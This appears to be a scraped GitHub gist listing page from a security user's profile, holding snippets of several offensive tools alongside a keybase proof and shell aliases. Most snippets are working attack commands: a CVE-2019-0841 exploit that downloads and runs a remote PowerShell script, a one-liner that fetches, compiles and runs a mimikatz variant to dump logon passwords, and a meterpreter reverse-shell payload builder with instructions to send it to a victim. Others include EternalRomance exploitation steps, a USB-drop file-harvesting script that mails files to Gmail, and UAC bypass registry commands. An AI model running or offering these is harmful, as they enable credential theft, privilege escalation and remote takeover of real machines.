I hereby claim:
- I am xillwillx on github.
- I am illwill (https://keybase.io/illwill) on keybase.
- I have a public key whose fingerprint is 6D14 E83A 93C6 3380 4F0F FF70 E170 DBAA AE04 6737
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $admins = Gwmi win32_groupuser –computer 127.0.0.1;$admins = $admins |? {$_.groupcomponent –like '*"Administrators"'}; $admins |% {$_.partcomponent –match “.+Domain\=(.+)\,Name\=(.+)$” > $nul;$matches[1].trim('"') + “\” + $matches[2].trim('"') | Select-Object @{Name='Account Name';Expression={$_}}} |
xillwillx
/ CVE-2019-0841.ps1
Last active
June 17, 2020 17:58
CVE-2019-0841 - Overwrite HOST file with "Full Control" permissions given to the user
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| iex (New-Object net.webclient).downloadstring('https://github.com/FuzzySecurity/PowerShell-Suite/raw/master/Native-HardLink.ps1');start microsoft-edge:;get-process -name MicrosoftEdge | Stop-process;sleep 2;Native-HardLink -Link "$env:localappdata\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings\settings.dat" -target "$env:windir\system32\drivers\etc\hosts";start microsoft-edge:;get-process -name Microsoftedge | stop-process |
xillwillx
/ gist:97a9fa7e10fc0d5bcca8f717bf76e904
Created
January 23, 2019 01:11
Pwnp1 ALOA with OLED
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh [email protected] | |
| nano /boot/config.txt | |
| ctrl+w to find | |
| Type: i2c_arm and add the uncommented lines underneath | |
| ## i2c_arm | |
| ## Enable the ARM's i2c interface | |
| ## | |
| ## Default off. | |
| ## |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| export PATH="$PATH:/usr/bin/" | |
| alias ll='ls -GFHAf -1' # ll: directory listing in 1 column | |
| alias f='open -a Finder ./' # f: Opens current directory in MacOS Finder | |
| alias cpwd='pwd|tr -d "\n"|pbcopy' # cpwd: copy the working directory path | |
| alias ..="cd ../" | |
| alias ...="cd ../../" | |
| alias ....="cd ../../../" | |
| alias wttr='curl wttr.in/06451?0u' | |
| alias myip='curl -s http://whatismyip.akamai.com/' ;echo |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH | |
| IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'` | |
| msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin | |
| PAYLOAD=$(cat payload.bin | base64 -w 0) | |
| sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js | |
| sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs | |
| sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta | |
| cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta | |
| service apache2 start | |
| echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\ |
xillwillx
/ gist:6db5cd392acafc1ac486f9852f698be6
Last active
September 19, 2018 19:03
EternalRomance Python Example with ReverseTCP Meterpreter
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Test victim IP first to see if exploitable | |
| msfconsole | |
| use auxiliary/scanner/smb/pipe_auditor | |
| set RHOSTS 192.168.128.19 | |
| exploit | |
| #*choose pipe name 'netlogon' | |
| ######Exploiting the Victim########## | |
| # Setup Meterpreter Handler |
xillwillx
/ FishSticks.ps1
Created
April 29, 2017 18:40
— forked from SadProcessor/FishSticks.ps1
Generate nefarious powershell wrapped in .wsf for USB-Drop Attacks. Will harvest all files with specified extensions from specified folders and send them to specified Gmail account.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| ____ _ _ ___ _ _ _ | |
| | __(_)__| |_ / __| |_(_)__| |__ ___ | |
| | _|| (_-< ' \\__ \ _| / _| / /(_-< | |
| |_| |_/__/_||_|___/\__|_\__|_\_\/__/.v1 | |
| "Life is like a box of FishSticks, you never know what you're gonna get..." | |
| Benjamin Buford "Bubba" Blue - 1965. |
xillwillx
/ .cmd
Last active
April 23, 2025 08:35
UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **UAC bypass for Win10:** | |
| reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f | |
| **UAC bypass for Win10:** | |
| reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f | |
| **UAC bypass for 7/8/10:** | |
| reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f |
xillwillx
/ keybase.md
Created
February 11, 2016 06:51